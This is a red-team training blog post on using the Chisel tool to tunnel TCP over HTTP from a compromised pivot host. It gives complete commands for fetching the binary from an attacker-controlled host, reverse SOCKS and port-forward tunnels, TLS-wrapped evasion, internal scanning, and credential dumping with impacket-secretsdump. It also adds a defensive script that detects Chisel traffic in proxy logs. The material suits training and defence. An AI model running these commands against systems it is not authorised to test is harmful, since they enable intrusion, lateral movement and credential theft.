Chisel: TCP Tunneling Over HTTP When Nothing Else Gets Through
- Tony Kelly
- May 25
- 4 min read

Series: The Community's Red Team
Post: 15 of 17
Tags: chisel, pivoting, tunneling, SOCKS, proxychains, port forwarding, tools
Read time: ~10 min
Prerequisites: Post 01 — Methodology Overview
You compromised a machine. That machine sits in a DMZ — it can reach the internal network, but your attack box cannot. The firewall allows outbound HTTP from the DMZ but blocks everything else. You need to get your tools into that internal network.
Chisel carries an SSH-encrypted tunnel inside a WebSocket, and a WebSocket begins life as an ordinary HTTP request. From the firewall's perspective, your traffic is one long-lived web connection. On your end, you get a SOCKS5 proxy that routes any TCP tool through the tunnel as if you were on that internal network.
This post covers Chisel's setup and the two main use cases: SOCKS proxy for full network access, and port forwarding for single-service access.
What Chisel Does
Chisel is a client/server tunneling tool written in Go. The server runs on your attack machine and waits for connections. The client runs on the compromised pivot host and connects back. Once the tunnel is established, traffic flows from your attack machine, through the tunnel, out the pivot host, and into the internal network.
The key advantage over SSH tunneling is that Chisel only needs HTTP/HTTPS connectivity from the pivot to your machine, not SSH: the client sends an HTTP request that is upgraded to a WebSocket, and the encrypted tunnel runs inside it. Many environments block outbound SSH but leave HTTP open.
Getting Chisel Onto the Pivot Host
Download the right binary for the target architecture from the releases page. For a 64-bit Linux pivot:
# Attack machine — download and serve
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
mv chisel_1.9.1_linux_amd64 chisel
python3 -m http.server 80
On the pivot host:
wget http://<your_ip>/chisel
chmod +x chisel
For Windows pivot hosts, download the Windows binary and transfer via CrackMapExec, SMB share, or base64 encode/decode.
Use Case 1: SOCKS5 Proxy (Full Network Access)
This is the main use case. You get a SOCKS proxy on your attack machine that routes all traffic through the pivot into the internal network.
On your attack machine (runs the server):
./chisel server -p 8080 --reverse
--reverse permits clients to request reverse tunnels (the R: remotes below): the listener is opened on the server side and traffic flows back through the client. Port 8080 is the port the server listens on, so it must be reachable from the pivot.
On the pivot host (runs the client):
./chisel client <your_attack_ip>:8080 R:socks
R:socks requests a reverse SOCKS proxy. Once the client connects, Chisel opens a SOCKS5 listener on your attack machine (the server side) at 127.0.0.1:1080.
Configure proxychains to use it:
Edit /etc/proxychains.conf (proxychains-ng, the version shipped on Kali, reads /etc/proxychains4.conf instead). Comment out any existing socks4 line and add:
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
Now use proxychains to route any tool through the tunnel:
proxychains nmap -Pn -sT 172.16.5.0/24 # scan internal subnet
proxychains nmap -Pn -sT 172.16.5.19 # scan specific internal host
proxychains xfreerdp /v:172.16.5.19 /u:administrator /p:Password1
proxychains ssh user@172.16.5.10
proxychains curl http://172.16.5.50/admin
Use Case 2: Single Port Forward
When you only need to access one specific service on the internal network — an MSSQL database, an internal web app, a specific RDP target — port forwarding is cleaner than a full SOCKS proxy.
Attack machine server:
./chisel server -p 8080 --reverse
Pivot host client — forward specific port:
./chisel client <your_attack_ip>:8080 R:4444:<internal_host>:3389
This forwards port 4444 on your local machine to port 3389 (RDP) on <internal_host> through the tunnel. Connect to it directly:
xfreerdp /v:127.0.0.1:4444 /u:administrator /p:Password1
Multiple forwards in one command:
./chisel client <your_attack_ip>:8080 R:4444:<host1>:3389 R:5555:<host2>:1433
Now port 4444 on your machine reaches RDP on host1, and port 5555 reaches MSSQL on host2.
HTTPS Mode (Blend Into Encrypted Traffic)
If the environment inspects unencrypted HTTP, wrap the tunnel in TLS. The server needs a key/certificate pair (a self-signed one is enough); --tls-skip-verify is a client-side flag that tells the client to accept that certificate without validating it. The file names below are placeholders:
Attack machine:
./chisel server -p 443 --reverse --tls-key server.key --tls-cert server.crt
Pivot host:
./chisel client --tls-skip-verify https://<your_attack_ip>:443 R:socks
The tunnel now runs over HTTPS, so the HTTP handshake and the tunnel payload are hidden from anything that does not terminate or intercept TLS; what remains visible on the wire is a long-lived TLS session to your server.
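From the defender's side, the handshake described in this post is what gives the tunnel away. The following is an added example, not code from the post or from Chisel: it scans constructed proxy-log records for Chisel's WebSocket subprotocol (chisel-v3 in current releases) and, for the HTTPS mode where that header is no longer visible, for the long-lived sessions a tunnel leaves behind. The log format, the addresses and the duration threshold are assumptions made for the example.

```python
"""Flag Chisel-style reverse tunnels in an outbound proxy log (added example).
Constructed log format: one line per outbound connection with request method,
Upgrade / Sec-WebSocket-Protocol header values ('-' if absent) and duration (s).
"""
import re
from ipaddress import ip_address

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>[^:\s]+):(?P<port>\d+) "
    r"(?P<method>\S+) (?P<uri>\S+) upgrade=(?P<upgrade>\S+) "
    r"subproto=(?P<subproto>\S+) dur=(?P<dur>\d+)$")

# Constructed records: 10.10.20.0/24 is the DMZ, 203.0.113.7 a hypothetical
# attacker server. Line 1 is a plaintext Chisel client (the post's HTTP mode);
# line 3 is the same server in HTTPS mode, where headers are no longer visible.
SAMPLE_LOG = """\
2024-05-25T10:00:01 src=10.10.20.5 dst=203.0.113.7:8080 GET / upgrade=websocket subproto=chisel-v3 dur=5400
2024-05-25T10:00:02 src=10.10.20.5 dst=198.51.100.10:443 GET /search upgrade=- subproto=- dur=1
2024-05-25T10:05:00 src=10.10.20.9 dst=203.0.113.7:443 CONNECT - upgrade=- subproto=- dur=7200
2024-05-25T10:06:00 src=10.10.20.9 dst=198.51.100.3:443 GET /ws upgrade=websocket subproto=- dur=30
"""
LONG_LIVED = 3600  # seconds; a tunnel stays up far longer than a page load


def is_bare_ip(host):
    """True when the proxy target was given as a literal IP, not a hostname."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def detect(log_text, allowlist=frozenset()):
    """Return (severity, src, dst, reason) tuples for suspicious connections.
    Rule 1 needs visible headers (plaintext HTTP or intercepted TLS); rules 2
    and 3 use only connection metadata, so they still apply in HTTPS mode."""
    alerts = []
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        r = m.groupdict()
        dst, dur = f"{r['dst']}:{r['port']}", int(r["dur"])
        if dst in allowlist:
            continue
        if r["subproto"].startswith("chisel-"):  # current clients send chisel-v3
            alerts.append(("high", r["src"], dst, "WebSocket subprotocol is Chisel's"))
        elif r["upgrade"].lower() == "websocket" and dur >= LONG_LIVED:
            alerts.append(("medium", r["src"], dst, "long-lived WebSocket to unlisted host"))
        elif r["method"] == "CONNECT" and dur >= LONG_LIVED and is_bare_ip(r["dst"]):
            alerts.append(("low", r["src"], dst, "long-lived TLS session to a bare IP"))
    return alerts
```

Run it as `detect(SAMPLE_LOG)`: the plaintext client is caught by its subprotocol, the HTTPS-mode client only by session duration, which is why egress allowlists and connection-duration baselines matter more than header inspection once TLS is in play.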
Proxychains Limitations to Know
Not every tool works transparently through proxychains:
Works: TCP-based tools — nmap (with -sT), xfreerdp, curl, wget, ssh, evil-winrm, impacket tools
Doesn't work: UDP-based tools, ICMP (ping), raw socket tools, SYN scans
Critical nmap flags when scanning through proxychains:
-sT — TCP connect scan (required: SYN scans need raw sockets, which proxychains cannot hook)
-Pn — skip host discovery (ICMP and other non-TCP probes cannot traverse a SOCKS5 proxy)
proxychains nmap -Pn -sT -p 22,80,443,445,3389,5985 172.16.5.10
Filtering False Positives During Scanning
If hundreds of ports come back "open" through proxychains, the proxy may be reporting a successful connect() for every port regardless of the real state. Add --open so only open ports are printed, and narrow the scan to a short port list:
proxychains nmap -Pn -sT --open -p 22,80,443,445,1433,3306,3389,5985 172.16.5.0/24
Quick Reference
# Attack machine — start server
./chisel server -p 8080 --reverse
# Pivot host — SOCKS proxy
./chisel client <attack_ip>:8080 R:socks
# Pivot host — single port forward
./chisel client <attack_ip>:8080 R:<local_port>:<internal_host>:<remote_port>
# HTTPS mode (attack machine; key/cert file names are placeholders)
./chisel server -p 443 --reverse --tls-key server.key --tls-cert server.crt
# HTTPS mode (pivot host)
./chisel client --tls-skip-verify https://<attack_ip>:443 R:socks
# /etc/proxychains.conf (or /etc/proxychains4.conf) — SOCKS5 entry, uncommented
socks5 127.0.0.1 1080
# Scan through tunnel
proxychains nmap -Pn -sT -p 22,80,443,445,3389 <internal_target>
# RDP through tunnel
proxychains xfreerdp /v:<internal_ip> /u:<user> /p:<pass>
# SSH through tunnel
proxychains ssh user@<internal_ip>
# Impacket through tunnel
proxychains impacket-secretsdump domain/admin:pass@<internal_DC>
What's Next
Post 16 covers Ligolo-ng — a more elegant pivoting solution that creates a virtual network interface on your attack machine instead of routing through proxychains. The result is that internal hosts appear directly reachable without any proxychains configuration, and native tools (including SYN scans) work without modification. It's the preferred tool for CPTS and complex multi-hop environments.
MeshForge — Training the Community's Red Team